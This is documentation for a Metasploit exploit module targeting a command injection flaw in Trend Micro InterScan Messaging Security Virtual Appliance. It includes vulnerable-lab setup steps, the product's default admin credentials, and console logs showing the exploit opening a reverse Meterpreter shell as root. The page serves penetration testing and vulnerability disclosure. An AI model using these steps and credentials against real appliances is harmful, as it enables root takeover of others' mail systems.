adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a3945784886c53f8d103dbc8faec1ddbe564a849
metasploit-gs/documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md
T
Mehmet Ince c2c352c2ac Adding Trend Micro IMSVA module
2017-01-18 11:34:16 +03:00

3.1 KiB
Raw Blame History

Vulnerable Application

This module exploits a command injection vulnerability in the Trend Micro InterScan Messaging Security (Virtual Appliance) product. An authenticated user can execute a terminal command under the context of the web server user which is root. Besides, default installation of IMSVA comes with a default administrator credentials.

saveCert.imss endpoint takes several user inputs and performs blacklisting. After that it use them as argument of predefined operating system command without proper sanitation. However,due to improper blacklisting rule it's possible to inject arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.

Vulnerable Application Installation Steps

IMSVA is distrubed as an ISO image by Trend Micro.

Following steps are valid on the CentOS 6 x64 bit operating system.

  1. Open following URL http://downloadcenter.trendmicro.com/
  2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
  3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
  4. Click to the download button and complete installation of ISO.

If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.

http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso

System requirements:

  • Virtualbox or VMware can be used.
  • 4 GB of memory at least.
  • 120 GB of disk size at least.

Verification Steps

A successful check of the exploit will look like this:

msf > use exploit/linux/http/trend_micro_imsva_exec 
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 12.0.0.140
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.140:60822) at 2017-01-18 11:29:36 +0300

meterpreter > getuid
Server username: root
meterpreter >

You must be getting no access error if the supplied username and password or default credentials are wrong.

msf exploit(trend_micro_imsva_exec) > back
msf > use exploit/linux/http/trend_micro_imsva_exec 
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) > 
msf exploit(trend_micro_imsva_exec) > set USERNAME notvalid
USERNAME => notvalid
msf exploit(trend_micro_imsva_exec) > set PASSWORD notvalid123
PASSWORD => notvalid123
msf exploit(trend_micro_imsva_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Attempting to login with notvalid:notvalid123
[-] Exploit aborted due to failure: no-access: 12.0.0.140:8445 - Login with notvalid:notvalid123 failed...
[*] Exploit completed, but no session was created.
Reference in New Issue View Git Blame Copy Permalink